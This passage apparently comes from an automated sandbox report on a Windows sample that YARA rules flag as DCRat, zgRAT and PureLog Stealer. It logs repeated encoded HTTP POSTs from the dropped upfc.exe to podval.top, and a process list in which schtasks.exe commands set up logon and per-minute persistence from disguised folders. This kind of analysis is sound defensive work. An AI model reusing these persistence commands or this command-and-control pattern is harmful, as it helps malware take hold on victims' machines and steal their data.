                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYRYXs6Gr%2FuYi1ShUKnGuPrRpQZXHsYpHUoIUUH39oBPTI090t36yhDI%2BDApfLxGAaS6Ampuvee9MMirx8PTt%2B3KeQZNamBwZVRxUK0eGFm7qj%2BuE0%2BivvXwj9Sk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a05ef78c8d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    142192.168.2.1049860188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:58.545974970 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:58.901098013 CEST1060OUTData Raw: 5f 55 5a 5e 5e 5f 57 59 58 56 55 51 50 5d 59 56 55 5e 5e 5b 51 5b 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ^^_WYXVUQP]YVU^^[Q[S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)0B$9_0 ?[=%U#%]9>!Y$C"337W;=4# ;"['$Y 5
                                                    Jul 3, 2024 16:43:59.023895979 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:59.374684095 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5gGJ3%2B%2BoSPUnDnv9qkibguIs1aCood%2BBaWZisfDByEW5BuRPfeA7tUpCtJlOAFJBUA069xLg0VB9kWqK7jVHZJhNLGHqQLBoLhhaBGhJrb%2BPQ4ppYOmFKOzDTPJ0"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a59d2e43f8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    143192.168.2.1049861188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:59.512029886 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:59.869689941 CEST1060OUTData Raw: 5f 50 5f 58 5b 5a 57 5f 58 56 55 51 50 5c 59 53 55 50 5e 5c 51 59 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_X[ZW_XVUQP\YSUP^\QYSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"')'*7$03^(-94.)Z9![3&5\3 /+Z ! [8"['$Y 1
                                                    Jul 3, 2024 16:43:59.967328072 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:00.180957079 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkioH0D26tpgEBTYOOKf%2FRkzZeg%2Bz%2Fhpbq7GHCRll2GC7ht5bJGBtPPpVb9rVpqmiXeRVlFK4GEv77iTiUBXC7VNaPxtVlztfMMefDt8NRAkcoZu3n6msfijdX2l"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6ab89be1a44-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    144192.168.2.1049862188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:44:00.323920012 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:44:00.682584047 CEST1060OUTData Raw: 5f 54 5f 54 5e 5f 52 5d 58 56 55 51 50 5b 59 51 55 5c 5e 58 51 58 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_T^_R]XVUQP[YQU\^XQXSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2$^33 >-V#=)Y:]&5Y$?V;X4"1([-<"['$Y -
                                                    Jul 3, 2024 16:44:00.843276024 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:01.087047100 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZgNqQ39dN6REcW9%2FSICOT6xVO4zs%2B1UKKvdr057osd2cRGOz6jNnE1ng33shekr9gO2msXVG2ZB0neGISPX%2FIUmcuvIIgZYDHqXfl%2Fanczs4fKQy7CHQbEAhD6U9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6b0dac943be-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    145192.168.2.1049863188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:44:01.238754034 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:44:01.588399887 CEST1060OUTData Raw: 5a 51 5f 5f 5e 5d 52 5d 58 56 55 51 50 5d 59 50 55 58 5e 5a 51 5e 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQ__^]R]XVUQP]YPUX^ZQ^S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]'9#&9;'?(=*4:,>9\$5)\$#,<78[/"['$Y 5
                                                    Jul 3, 2024 16:44:01.709464073 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:02.059791088 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JeHWnHI6liQxrZUfYUrAtDvV4f5J%2FkgwU62tAtsltsA7DhhHa%2BWsRSfLwM3mkZ%2FizHDUngVKfkywpmybzbgzLEHLmxvsJ2SqPT2evVc2yNYIsMSbTaLtJy%2BdHVBz"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6b65c97c342-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:10:41:57
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                                    Imagebase:0x3b0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"
                                                    Imagebase:0x7ff75cdf0000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff620390000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"
                                                    Imagebase:0x7ff761ba0000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"
                                                    Imagebase:0x7ff75cdf0000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff620390000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"
                                                    Imagebase:0x7ff761ba0000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                                    Imagebase:0xa80000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 73%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:18
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                                    Imagebase:0xef0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 14 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /f
                                                    Imagebase:0x7ff7df220000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 6 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:30
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:32
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab" /sc ONLOGON /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:33
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat"
                                                    Imagebase:0x7ff67cd10000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff620390000
